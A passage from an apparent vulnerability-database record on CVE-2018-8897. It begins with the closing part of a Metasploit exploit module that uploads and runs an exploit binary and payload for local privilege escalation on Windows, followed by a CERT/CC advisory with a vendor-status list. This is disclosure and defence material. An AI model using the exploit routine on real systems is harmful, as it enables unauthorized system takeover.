ensure_clean_payload_destination\r\n ensure_clean_destination(payload_path)\r\n end\r\n\r\n def upload_exploit\r\n local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe')\r\n upload_file(exploit_path, local_exploit_path)\r\n print_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\")\r\n end\r\n\r\n def upload_payload\r\n write_file(payload_path, payload_exe)\r\n print_status(\"Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}\")\r\n end\r\n\r\n def execute_exploit\r\n sleep(datastore['EXECUTE_DELAY'])\r\n print_status(\"Running exploit #{exploit_path} with payload #{payload_path}\")\r\n output = cmd_exec('cmd.exe', \"/c #{exploit_path} #{payload_path}\")\r\n vprint_status(output)\r\n end\r\n\r\n def exploit\r\n begin\r\n validate_active_host\r\n validate_target\r\n validate_remote_path(temp_path)\r\n ensure_clean_exploit_destination\r\n ensure_clean_payload_destination\r\n upload_exploit\r\n upload_payload\r\n execute_exploit\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n print_error(e.message)\r\n ensure_clean_exploit_destination\r\n ensure_clean_payload_destination\r\n end\r\n end\r\n\r\n attr_reader :exploit_name\r\n attr_reader :payload_name\r\n attr_reader :payload_exe\r\n attr_reader :temp_path\r\n attr_reader :payload_path\r\n attr_reader :exploit_path\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/45024/"}], "cert": [{"lastseen": "2020-09-18T20:44:06", "bulletinFamily": "info", "cvelist": ["CVE-2018-8897"], "description": "### Overview \n\nIn some circumstances, some operating systems or hypervisors may not expect or properly handle an Intel architecture hardware debug exception. The error appears to be due to developer interpretation of existing documentation for certain Intel architecture interrupt/exception instructions, namely MOV SS and POP SS.\n\n### Description \n\n[**CWE-703**](<http://cwe.mitre.org/data/definitions/703.html>)**: Improper Check or Handling of Exceptional Conditions - **CVE-2018-8897\n\nThe MOV SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A; section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV SS or POP SS instruction itself). Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol 3A; section 2.3). \n \nIf the instruction following the MOV SS or POP SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at Current Privilege Level (CPL) < 3, a debug exception is delivered after the transfer to CPL < 3 is complete. Such deferred #DB exceptions by MOV SS and POP SS may result in unexpected behavior. \n \nTherefore, in certain circumstances after the use of certain Intel x86-64 architecture instructions, a debug exception pointing to data in a lower ring (for most operating systems, the kernel Ring 0 level) is made available to operating system components running in Ring 3. This may allow an attacker to utilize operating system APIs to gain access to sensitive memory information or control low-level operating system functions. \n \nSeveral operating systems appear to incorrectly handle this exception due to interpretation of potentially unclear existing documentation and guidance on the use of these instructions. \n \nMore details can be found in the [researcher's paper](<https://everdox.net/popss.pdf>). \n \n--- \n \n### Impact \n\nAn authenticated attacker may be able to read sensitive data in memory or control low-level operating system functions, \n \n--- \n \n### Solution \n\n**Apply an update** \n \nCheck with your operating system or software vendor for updates to address this issue. There is no expected performance impact for applying an update. A list of affected vendors and currently-known updates is provided below. \n \n--- \n \n### Vendor Information\n\n631579\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple __ Affected\n\nNotified: May 01, 2018 Updated: May 08, 2018 \n\n**Statement Date: May 08, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nApple has released a [Security Update 2018-001](<https://support.apple.com/en-us/HT208742>) to address this issue.\n\n### Vendor References\n\n * <https://support.apple.com/en-us/HT208742>\n\n### Check Point Software Technologies __ Affected\n\nNotified: May 01, 2018 Updated: May 10, 2018 \n\n**Statement Date: May 10, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nCheck Point sees these as non-exploitable, taking our business logic and best practices into consideration. \n \nSee details at SecureKnowledge [sk126534](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk126534>).\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk126534](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk126534>)\n\n### DragonFly BSD Project Affected\n\nNotified: May 01, 2018 Updated: May 01, 2018 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### FreeBSD Project __ Affected\n\nNotified: April 30, 2018 Updated: May 07, 2018 \n\n**Statement Date: May 07, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nMore information is available in the [FreeBSD Security Advisory 18:06](<https://security.freebsd.org/advisories/FreeBSD-SA-18:06.debugreg.asc>).\n\n### Vendor References\n\n * <https://security.FreeBSD.org/advisories/FreeBSD-SA-18:06.debugreg.asc>\n\n### Linux Kernel __ Affected\n\nUpdated: May 08, 2018 \n\n**Statement Date: May 08, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe issue was fixed upstream on March 23, with Linux \"stable\" branches was fixed shortly thereafter. Therefore the following kernels (or higher) contain the patch: 4.15.14, 4.14.31, 4.9.91, 4.4.125. The older 4.1, 3.16, and 3.2 branches are also affected.\n\n### Microsoft __ Affected\n\nNotified: May 01, 2018 Updated: May 01, 2018 \n\n**Statement Date: May 01, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n**The update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.**\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8897>\n\n### Red Hat, Inc. __ Affected\n\nNotified: May 01, 2018 Updated: May 08, 2018 \n\n**Statement Date: May 08, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nRed Hat Enterprise Linux is affected. Please see the [security advisory](<https://access.redhat.com/security/vulnerabilities/pop_ss>) for more information.\n\n### Vendor References\n\n * <https://access.redhat.com/security/vulnerabilities/pop_ss>\n\n### Ubuntu Affected\n\nNotified: May 01, 2018 Updated: May 01, 2018 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ubuntu __ Affected\n\nNotified: May 01, 2018 Updated: May 08, 2018 \n\n**Statement Date: May 08, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nPlease see Ubuntu Security Notices [USN-3641-1](<https://usn.ubuntu.com/3641-1/>) and [USN-3641-2](<https://usn.ubuntu.com/3641-2/>) for more details.\n\n### Vendor References\n\n * <https://usn.ubuntu.com/3641-1/>\n * <https://usn.ubuntu.com/3641-2/>\n\n### VMware __ Affected\n\nNotified: May 01, 2018 Updated: May 07, 2018 \n\n**Statement Date: May 07, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nVMware has issued a [statement](<https://kb.vmware.com/s/article/54988>) about this vulnerability report. Please see the statement for full details.\n\n### Vendor References\n\n * <https://kb.vmware.com/s/article/54988>\n\n### Xen __ Affected\n\nNotified: May 01, 2018 Updated: May 01, 2018 \n\n**Statement Date: May 01, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAll versions of Xen are vulnerable. Only x86 systems are vulnerable. ARM systems are not vulnerable. \n \nOnly x86 PV guests can exploit the vulnerability. x86 HVM and PVH guests cannot exploit the vulnerability. \n \nAn attacker needs to be able to control hardware debugging facilities to exploit the vulnerability, but such permissions are typically available to unprivileged users. \n \n \nMITIGATION \n========== \n \nRunning only HVM or PVH guests avoids the vulnerability. \n \nNote however that a compromised device model (running in dom0 or a stub domain) can carry out this attack, so users with HVM domains are also advised to patch their systems. \n \n \nRESOLUTION \n========== \nApplying the appropriate attached patch resolves this issue.\n\n### Vendor Information \n\nFor the full statement, please see [Xen Advisory 260](<https://xenbits.xen.org/xsa/advisory-260.html>).\n\n### Vendor References\n\n * <https://xenbits.xen.org/xsa/advisory-260.html>\n\n### Brocade Communication Systems Not Affected\n\nNotified: May 01, 2018 Updated: May 30, 2018 \n\n**Statement Date: May 27, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Intel __ Not Affected\n\nNotified: May 01, 2018 Updated: May 09, 2018 \n\n**Statement Date: May 05, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nAt this time, we are not aware of any Intel Products affected by CVE-2018-8897.\n\n### Vendor References\n\n * [httpwww.intel.com/sdm](<httpwww.intel.com/sdm>)\n\n### Joyent __ Not Affected\n\nNotified: May 01, 2018 Updated: May 01, 2018 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nSmartOS does not allow access to the debug register outside of debug mode and so is not affected.\n\n### NetBSD __ Not Affected\n\nNotified: May 01, 2018 Updated: May 01, 2018 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nNetBSD does not support debug register and so is not affected.\n\n### OpenBSD Not Affected\n\nNotified: May 01, 2018 Updated: May 08, 2018 \n\n**Statement Date: May 08, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### QUALCOMM Incorporated Not Affected\n\nNotified: May 01, 2018 Updated: June 06, 2018 \n\n**Statement Date: June 05, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ZyXEL __ Not Affected\n\nNotified: May 01, 2018 Updated: May 21, 2018 \n\n**Statement Date: May 14, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNo Zyxel products are vulnerable to unexpected operating system behavior resulting from an Intel architecture hardware debug exception, as reported in [CERT/CC] vulnerability note VU#631579 at <https://www.kb.cert.org/vuls/id/631579>. \n\n### Vendor Information \n\nZyxel has issued Zyxel-SA-1135-01 stating that no products are affected.\n\n### eero Not Affected\n\nNotified: May 01, 2018 Updated: May 08, 2018 \n\n**Statement Date: May 08, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### 3com Inc Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ACCESS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ADTRAN Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ARRIS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ASP Linux Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AT&T Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AVM GmbH Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Actiontec Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AirWatch Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Alcatel-Lucent Enterprise Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Android Open Source Project Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Appgate Network Security Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Arch Linux Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Arista Networks, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Aruba Networks Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AsusTek Computer Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Avaya, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Belkin, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### BlackBerry Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### BlueCat Networks, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Broadcom Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### CA Technologies Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cambium Networks Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cisco Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Command Software Systems Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### CoreOS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### D-Link Systems, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Debian GNU/Linux Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Dell Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Dell EMC Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### DesktopBSD Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Deutsche Telekom Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Devicescape Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Digi International Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### EfficientIP SAS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Espressif Systems Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Extreme Networks Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### F-Secure Corporation Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Force10 Networks Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### GNU glibc Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Geexbox Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Gentoo Linux Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Google Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### HTC Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### HardenedBSD Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Hitachi Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Honeywell Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Huawei Technologies Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### IBM Corporation (zseries) Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM, INC. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### InfoExpress, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Internet Systems Consortium Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Internet Systems Consortium - DHCP Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Interniche Technologies, inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Juniper Networks Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Lancope Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Lantronix Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Lenovo Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Linksys Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Marvell Semiconductors Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### MediaTek Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### MetaSwitch Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Micro Focus Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Microchip Technology Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### MikroTik Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Mitel Networks, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NETSCOUT Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Netgear, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Nokia Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Nominum Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OmniTI Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor 